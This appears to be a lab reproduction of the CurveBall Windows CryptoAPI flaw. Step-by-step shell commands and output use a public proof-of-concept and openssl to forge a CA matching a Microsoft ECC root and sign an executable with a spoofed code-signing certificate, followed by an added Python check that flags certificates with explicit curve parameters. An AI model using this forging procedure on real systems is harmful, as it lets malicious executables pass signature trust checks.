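Affected versions:
Windows 10
Windows Server 2016/2019
Applications that rely on the Windows CryptoAPI
View the Windows certificates
Look at the local Windows certificates: press Win+R and enter certmgr.msc
Here you can see the system's default ECC-signed root certificates; pick any one and export it:
Double-click the certificate to see its details:
Reproduction:
//Install ruby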
a@a-virtual-machine:~$ sudo apt install ruby
//If apt reports that the process is in use, fix it as follows
//ps -A | grep apt lists the processes in use
//sudo kill -9 <PID> kills the process
//Generate the spoofed_ca.key key file
a@a-virtual-machine:~/CurveBall-master$ ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
//Generate the spoofed_ca.crt certificate file
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Can't load /home/a/.rnd into RNG
140535782355392:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/a/.rnd
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:aa
State or Province Name (full name) [Some-State]:aa
Locality Name (eg, city) []:aa
Organization Name (eg, company) [Internet Widgits Pty Ltd]:aa
Organizational Unit Name (eg, section) []:aa
Common Name (e.g. server FQDN or YOUR name) []:aa
Email Address []:aa '
//Generate the cert.key key file
a@a-virtual-machine:~/CurveBall-master$ openssl ecparam -name secp384r1 -genkey -noout -out cert.key
//Generate the cert.csr file
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
//Generate the signed certificate cert.crt
a@a-virtual-machine:~/CurveBall-master$ openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
Signature ok
subject=C = DK, ST = Denmark, L = Copenhagen, O = ollypwn, CN = ollypwn
Getting CA Private Key
//Generate the cert.p12 certificate file
a@a-virtual-machine:~/CurveBall-master$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
Enter Export Password:
Verifying - Enter Export Password:
//Generate the signed executable python_signed.exe
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe
Command 'osslsigncode' not found, but can be installed with:
sudo apt install osslsigncode
a@a-virtual-machine:~/CurveBall-master$ sudo apt install osslsigncode
[sudo] a 的密码:
正在读取软件包列表... 完成
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out python_signed.exe
Succeeded
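A defender-side check for the certificates this procedure produces, as an added example that is not from the original post or the CurveBall repository. It assumes the spoofed CA key and certificate encode their curve as explicit parameters rather than as a named-curve OID, and classifies a PEM or DER certificate or public key accordingly; the function names and sample blobs are constructed for illustration.

```python
import base64
import re

# DER bytes (tag + length + value) of OID 1.2.840.10045.2.1, id-ecPublicKey
EC_PUBKEY_OID = bytes.fromhex("06072a8648ce3d0201")
KINDS = {0x06: "named-curve", 0x30: "explicit", 0x05: "implicit"}

def to_der(data: bytes) -> bytes:
    """Return DER bytes for PEM or DER input."""
    m = re.search(rb"-----BEGIN [^-]+-----(.*?)-----END [^-]+-----", data, re.S)
    return base64.b64decode(m.group(1)) if m else data

def ec_param_kind(data: bytes) -> str:
    """Classify the EC parameters that follow id-ecPublicKey in a cert or SPKI."""
    der = to_der(data)
    pos = der.find(EC_PUBKEY_OID)  # heuristic byte search, not a full ASN.1 parse
    if pos < 0:
        return "not-ec"
    nxt = pos + len(EC_PUBKEY_OID)
    if nxt >= len(der):
        return "truncated"
    return KINDS.get(der[nxt], "unknown")

def flag_explicit(blobs: dict) -> list:
    """Names of inputs whose EC key uses explicit curve parameters."""
    return sorted(n for n, b in blobs.items() if ec_param_kind(b) == "explicit")

def tlv(tag: int, body: bytes) -> bytes:
    """Minimal DER TLV encoder, used only to build the constructed samples."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    size = (n.bit_length() + 7) // 8
    return bytes([tag, 0x80 | size]) + n.to_bytes(size, "big") + body

# Constructed samples (not real keys): SubjectPublicKeyInfo skeletons
POINT = tlv(0x03, b"\x00\x04" + b"\x11" * 96)
NAMED = tlv(0x30, tlv(0x30, EC_PUBKEY_OID + bytes.fromhex("06052b81040022")) + POINT)
EXPLICIT = tlv(0x30, tlv(0x30, EC_PUBKEY_OID + tlv(0x30, tlv(0x02, b"\x01") + tlv(0x04, b"\x22" * 48))) + POINT)
RSA = tlv(0x30, tlv(0x30, bytes.fromhex("06092a864886f70d0101010500")) + tlv(0x03, b"\x00"))
NAMED_PEM = b"-----BEGIN PUBLIC KEY-----\n" + base64.encodebytes(NAMED) + b"-----END PUBLIC KEY-----\n"

if __name__ == "__main__":
    samples = {"named": NAMED, "named_pem": NAMED_PEM, "explicit": EXPLICIT, "rsa": RSA}
    for name, blob in samples.items():
        print(name, ec_param_kind(blob))
    print("flagged:", flag_explicit(samples))
```

To check a real file, pass its bytes to `ec_param_kind`; an `explicit` result on a certificate in a code-signing or TLS chain warrants investigation, since certificates from public CAs use named curves.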
References:
https://github.com/ollypwn/CurveBall
https://blog.csdn.net/Eastmount/article/details/104335673